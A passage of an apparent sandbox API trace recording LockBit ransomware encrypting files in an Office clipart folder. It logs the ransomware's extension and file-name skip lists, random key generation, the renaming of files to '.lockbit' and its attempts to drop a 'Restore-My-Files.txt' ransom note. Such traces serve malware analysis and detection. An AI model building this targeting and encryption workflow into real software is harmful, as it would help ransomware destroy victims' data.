returned -1 [0155.409] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0155.409] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0293832.WMF") returned 1 [0155.410] lstrcmpiW (lpString1="ntldr", lpString2="J0293832.WMF") returned 1 [0155.410] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0293832.WMF") returned 1 [0155.410] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0293832.WMF") returned -1 [0155.410] lstrcmpiW (lpString1="autorun.inf", lpString2="J0293832.WMF") returned -1 [0155.410] lstrcmpiW (lpString1="thumbs.db", lpString2="J0293832.WMF") returned 1 [0155.410] lstrcmpiW (lpString1="iconcache.db", lpString2="J0293832.WMF") returned -1 [0155.410] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0155.410] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0293832.WMF") returned=".WMF" [0155.410] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0155.410] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0155.410] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0155.411] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0155.411] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0155.411] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0155.411] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0155.411] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0155.411] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0155.411] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0155.411] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0155.411] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0155.411] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0155.411] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0155.411] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0155.411] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0155.411] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0155.411] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0155.411] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0155.411] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0155.411] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0155.411] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0155.411] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0293832.WMF.lockbit") returned 72 [0155.411] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0293832.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0293832.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0155.412] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0155.412] malloc (_Size=0x40068) returned 0x3df0008 [0155.412] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6078) returned 1 [0155.412] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.413] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0155.413] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.413] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0155.413] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0155.801] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0293832.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0293832.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0155.801] malloc (_Size=0xa6) returned 0x1fa2ed8 [0155.801] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0155.856] free (_Block=0x1fa2ed8) [0155.856] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0293832.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0155.856] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0155.856] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0155.856] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x566b3c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x37de, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0294989.WMF", cAlternateFileName="")) returned 1 [0155.856] lstrcmpiW (lpString1=".", lpString2="J0294989.WMF") returned -1 [0155.856] lstrcmpiW (lpString1="..", lpString2="J0294989.WMF") returned -1 [0155.856] PathFindExtensionW (pszPath="J0294989.WMF") returned=".WMF" [0155.856] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0155.856] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0155.856] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0155.857] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0155.857] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0155.858] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0155.858] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0155.858] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0155.858] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0155.858] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0155.858] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0155.858] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0155.858] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0155.858] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0155.858] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0155.858] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0155.858] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0155.858] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0155.858] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0155.858] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0155.858] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0155.858] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0155.858] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0155.858] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0294989.WMF") returned 1 [0155.858] lstrcmpiW (lpString1="ntldr", lpString2="J0294989.WMF") returned 1 [0155.858] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0294989.WMF") returned 1 [0155.858] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0294989.WMF") returned -1 [0155.858] lstrcmpiW (lpString1="autorun.inf", lpString2="J0294989.WMF") returned -1 [0155.858] lstrcmpiW (lpString1="thumbs.db", lpString2="J0294989.WMF") returned 1 [0155.858] lstrcmpiW (lpString1="iconcache.db", lpString2="J0294989.WMF") returned -1 [0155.858] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0155.859] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0294989.WMF") returned=".WMF" [0155.859] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0155.859] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0155.859] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0155.859] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0155.859] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0155.859] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0155.859] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0155.859] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0155.859] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0155.859] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0155.859] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0155.859] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0155.859] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0155.859] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0155.859] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0155.861] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0155.862] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0155.862] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0155.862] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0155.862] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0155.862] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0155.862] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0155.862] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0155.862] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0155.862] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0155.862] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0155.862] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0155.862] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0155.862] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0294989.WMF.lockbit") returned 72 [0155.862] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0294989.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0294989.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0155.865] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0155.865] malloc (_Size=0x40068) returned 0x3df0008 [0155.865] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=14302) returned 1 [0155.865] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.866] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0155.866] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.867] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0155.867] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0156.292] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0294989.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0294989.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0156.292] malloc (_Size=0xa6) returned 0x1fa2ed8 [0156.292] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0156.378] free (_Block=0x1fa2ed8) [0156.378] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0294989.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0156.378] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0156.378] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0156.379] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x566b3c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x6180, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0294991.WMF", cAlternateFileName="")) returned 1 [0156.379] lstrcmpiW (lpString1=".", lpString2="J0294991.WMF") returned -1 [0156.379] lstrcmpiW (lpString1="..", lpString2="J0294991.WMF") returned -1 [0156.379] PathFindExtensionW (pszPath="J0294991.WMF") returned=".WMF" [0156.379] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0156.379] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0156.379] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0156.379] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0156.379] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0156.379] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0156.379] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0156.379] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0156.379] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0156.379] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0156.379] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0156.379] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0156.379] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0156.379] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0156.379] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0156.379] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0156.379] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0156.379] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0156.379] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0156.379] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0156.379] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0156.379] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0156.380] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0156.380] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0156.380] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0156.380] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0156.380] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0156.380] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0156.380] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0156.380] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0156.380] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0156.380] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0156.380] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0156.380] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0156.380] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0156.380] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0156.380] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0156.380] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0156.380] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0156.380] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0156.380] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0156.380] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0156.380] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0156.380] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0156.380] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0156.381] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0156.381] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0156.381] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0294991.WMF") returned 1 [0156.381] lstrcmpiW (lpString1="ntldr", lpString2="J0294991.WMF") returned 1 [0156.381] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0294991.WMF") returned 1 [0156.381] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0294991.WMF") returned -1 [0156.381] lstrcmpiW (lpString1="autorun.inf", lpString2="J0294991.WMF") returned -1 [0156.381] lstrcmpiW (lpString1="thumbs.db", lpString2="J0294991.WMF") returned 1 [0156.381] lstrcmpiW (lpString1="iconcache.db", lpString2="J0294991.WMF") returned -1 [0156.381] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0156.381] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0294991.WMF") returned=".WMF" [0156.381] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0156.381] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0156.381] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0156.381] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0156.381] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0156.381] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0156.381] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0156.381] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0156.381] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0156.382] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0156.382] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0156.382] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0156.382] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0156.382] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0156.382] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0156.382] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0156.382] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0156.382] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0156.382] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0156.382] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0156.382] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0156.382] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0156.382] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0156.382] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0156.382] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0156.382] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0156.382] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0156.382] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0156.382] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0294991.WMF.lockbit") returned 72 [0156.382] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0294991.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0294991.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0156.383] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0156.383] malloc (_Size=0x40068) returned 0x3df0008 [0156.383] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=24960) returned 1 [0156.383] LoadLibraryA 